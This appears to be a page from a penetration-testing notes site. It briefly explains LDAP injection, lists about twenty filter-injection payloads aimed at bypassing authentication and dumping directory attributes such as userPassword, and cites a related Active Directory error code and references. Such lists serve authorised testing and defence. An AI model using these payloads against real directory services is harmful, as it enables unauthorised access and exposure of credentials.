LDAP Injection

LDAP Injection is a type of security vulnerability that can occur in web applications that use Lightweight Directory Access Protocol (LDAP) for authentication and/or authorization. It is a form of injection attack similar to SQL injection, but instead of targeting a database, it targets an LDAP server.

Payloads

*
*)(&
*))%00
)(cn=))\x00
*()|%26'
*()|&'
*(|(mail=*))
*(|(objectclass=*))
*)(uid=*))(|(uid=*
*/*
*|
/
//
//*
@*
|
admin*
admin*)((|userpassword=*)
admin*)((|userPassword=*)
x' or name()='username' or 'x'='y

Errors

When testing for LDAP Injection, sometimes only an error will be output in the response. For example, the error code 0x80005000 :

Exception Unknown error (0x80005000) while creating Active Directory User programmatically - Microsoft Q&A

References

PayloadsAllTheThings/LDAP Injection at master · swisskyrepo/PayloadsAllTheThingsGitHub

LDAP InjectionHackTricks

LDAP injection

PreviousXML External Entity Injection (XXE)NextNoSQL Injection

Last updated 1 year ago